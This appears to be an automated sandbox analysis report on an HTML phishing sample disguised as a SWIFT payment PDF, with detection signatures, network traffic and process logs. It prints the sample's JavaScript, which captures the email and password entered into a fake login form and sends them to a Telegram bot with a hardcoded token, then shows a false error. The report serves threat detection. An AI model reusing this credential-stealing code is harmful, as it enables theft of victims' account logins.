Windows Analysis Report
swift-copy31072024PDF.html

Overview

General Information

Sample name: swift-copy31072024PDF.html
Analysis ID: 1544346
MD5: 21de1eced0bba2c144b3f9a267f95fd7
SHA1: d08160beca4b007084fc5e9b1df1ce3b44de6e85
SHA256: 6aa352aa8f89d3dbc564639ea5ad6c32b3ab5b248b087dca8d37b483674de47a

Detection

HTMLPhisher
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
HTML document with suspicious name
HTML file submission containing password form
Javascript uses Telegram API
Uses the Telegram API (likely for C&C communication)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
None HTTPS page querying sensitive user data (password, username or email)
Stores files to the Windows start menu directory

Classification

Phishing

Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html LLM: Score: 10 Reasons: HTML file with login form DOM: 1.0.pages.csv
Source: Yara match File source: swift-copy31072024PDF.html, type: SAMPLE
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html HTTP Parser: document.getelementbyid('loginform').addeventlistener('submit', function(event) { event.preventdefault(); var email = document.getelementbyid('email').value; var password = document.getelementbyid('password').value; var apikey = '7143837038:aah8epg67nubqq5-xg1extwtgi0rzkmui28'; var chatid = '7463984269'; var message = 'submission:\nemail: ' + email + '\npassword: ' + password; var url = 'https://api.telegram.org/bot' + apikey + '/sendmessage?chat_id=' + chatid + '&text=' + encodeuricomponent(message); fetch(url) .then(function(response) { if (response.ok) { alert('failed: sign in incorrect. please press ok and try again.'); } else { alert('failed: sign in incorrect. please press ok and try again.'); } }) .catch(function(error) { alert('verbumnetworks.net'); }); });
Source: swift-copy31072024PDF.html HTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html HTTP Parser: Number of links: 0
Source: swift-copy31072024PDF.html HTTP Parser: <input type="password" .../> found but no <form action="...
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html HTTP Parser: <input type="password" .../> found but no <form action="...
Source: swift-copy31072024PDF.html HTTP Parser: Title: continue does not match URL
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html HTTP Parser: Title: continue does not match URL
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html HTTP Parser: Has password / email / username input fields
Source: swift-copy31072024PDF.html HTTP Parser: <input type="password" .../> found
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html HTTP Parser: <input type="password" .../> found
Source: swift-copy31072024PDF.html HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html HTTP Parser: No favicon
Source: swift-copy31072024PDF.html HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html HTTP Parser: No <meta name="author".. found
Source: swift-copy31072024PDF.html HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html HTTP Parser: No <meta name="copyright".. found
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:56535 version: TLS 1.2
Source: chrome.exe Memory has grown: Private usage: 1MB later: 29MB

Networking

Source: unknown DNS query: name: api.telegram.org (repeated 6 times)
Source: global traffic TCP traffic: 192.168.2.16:56524 -> 1.1.1.1:53 (repeated 11 times)
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203 (7 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108 (8 occurrences)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27 (18 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.10 (7 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56528 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56530 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56547 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56540 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56537 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56533 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56529 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56529
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56525 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56525
Source: unknown Network traffic detected: HTTP traffic on port 56546 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56526
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56527
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56528
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56530
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56531
Source: unknown Network traffic detected: HTTP traffic on port 56543 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56536 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56526 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56532 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56536
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56537
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56539
Source: unknown Network traffic detected: HTTP traffic on port 56545 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56532
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56533
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56534
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56535
Source: unknown Network traffic detected: HTTP traffic on port 56539 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56540
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56541
Source: unknown Network traffic detected: HTTP traffic on port 56542 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56542
Source: unknown Network traffic detected: HTTP traffic on port 56535 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 56527 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56531 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56547
Source: unknown Network traffic detected: HTTP traffic on port 56544 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56543
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56544
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56545
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56546
Source: unknown Network traffic detected: HTTP traffic on port 56541 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 56534 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707

System Summary

Source: Name includes: swift-copy31072024PDF.html Initial sample: swift
Source: classification engine Classification label: mal72.phis.troj.winHTML@14/20@8/97
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\swift-copy31072024PDF.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1876,i,5721794662497170584,7017191593047677730,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown (repeated 2 times)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown (repeated 9 times)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Stealing of Sensitive Information

Source: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html HTTP Parser: file:///C:/Users/user/Desktop/swift-copy31072024PDF.html